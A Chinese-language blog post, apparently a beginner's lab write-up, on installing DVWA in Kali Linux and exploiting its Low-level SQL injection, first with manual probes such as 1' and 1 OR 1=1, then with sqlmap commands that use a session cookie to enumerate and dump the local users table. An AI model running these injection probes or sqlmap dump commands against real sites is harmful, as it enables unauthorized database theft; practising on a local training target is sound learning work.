DVWA靶场上Low级别SQL注入漏洞学习

做了几年网络运维,最近想要从0开始系统的学习网络安全技术。于是安装了虚拟机和kali系统,从头开始学习。Kali Linux 官方软件源已经收录了 DVWA(Damn Vulnerable Web Application),可以直接通过 apt 命令一键安装。

##(一) Kali Linux系统上安装DVWA

1.打开终端,执行如下命令:

bash 复制代码
sudo apt update
sudo apt install dvwa

2.启动环境:

bash 复制代码
sudo dvwa-start

3.访问并初始化

打开浏览器,访问 http://127.0.0.1/dvwa/http://localhost/dvwa/。

点击页面底部的 Create / Reset Database 按钮。

使用默认账号登录:Username: admin,Password: password。

4.设置难度

登录后,在左侧菜单点击 DVWA Security,将安全级别设为 Low(初学者建议),点击 Submit 保存。

(二)手动测试漏洞

输入1'进行测试,如果页面报错,说明'被传进去,并破坏了SQL查询结构。如果页面正常显示,说明可能被过滤或者转义了。(可能存在漏洞,也可能没有漏洞)

1、输入1'进行测试时,如果报错分三种情况:

(1)后台代码为'id'(字符串型注入);

(2)后台代码为id(数字型注入);

(3)其他注入漏洞(盲注等)。

2、输入1'进行测试时,如果页面正常显示,可以尝试1 OR 1 = 1(可能存在盲注,盲注如果手动测试只能猜。比如通过折半查找猜数据库名称。)

结合测试的流程和可能出现的结果,根据自身理解画了一个逻辑图如下:

(三)用sqlmap工具测试

因为DVWA需要登录,所以利用sqlmap工具的时候需要先获得此时页面的cookie。

1、具体操作如下:

刷新页面:在 DVWA 的 SQL Injection 页面,按 F12 刷新一下。

找到正确的请求:在 Network 标签里,点击第一个以 sqli 开头的请求(通常是 GET sqli)。

查看请求头:在弹出的右侧面板中,找到 Request Headers 部分。

会看到类似这样的内容:

Cookie: PHPSESSID=abc123def456; security=low

把 PHPSESSID=abc123def456; security=low 完整地复制下来。

具体利用

2、利用sqlmap可以自动找出存在的注入漏洞类型,并进行利用,具体的操作步骤如下:

(1) 利用这条命令,可以自动找出存在的注入漏洞类型。一定要确保是登陆状态,如果不登陆(无?id=1&Submit=Submit)运行不成功,因为cookie是认证后的。正常的网站一般是不需要登录的。这里是在DVWA靶机上,环境必须登录。本人学习的时候登陆状态掉了,刚开始就一直不成功。

bash 复制代码
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" --batch 

(2)下面这条命令是查看数据库名字的,同样需要登录平台。

bash 复制代码
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" --current-db

(3)下面这条命令可以查看数据库里有几张表(显示结果有guestbook和users)。

bash 复制代码
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" -D dvwa --tables

(4)下面这条命令可查看表users中有哪些字段,用什么类型数据进行存储。

bash 复制代码
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" -D dvwa -T users --columns

(5)下面这条命令进行数据库脱库,可将users这张表下载下来。到此已经完成了漏洞的利用。得到数据库中信息后可以进行进一步的利用。

bash 复制代码
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" -D dvwa -T users --dump 
相关推荐
零零信安20 小时前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
BD_Marathon20 小时前
SQL学习指南——视图
数据库·sql
2601_9620725520 小时前
李梦娇常识4600问|题库|打印版
sql·华为od·华为·c#·华为云·.net·harmonyos
憧憬成为web高手21 小时前
l33t-hoster
学习·web安全·网络安全
HackTwoHub1 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
Volunteer Technology1 天前
Flink Table API与SQL(一)
大数据·sql·flink
爱网络爱Linux1 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc1 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing1 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
Theo·Chan1 天前
更换 Kingbase V9 License 踩坑记
sql·信创·kingbase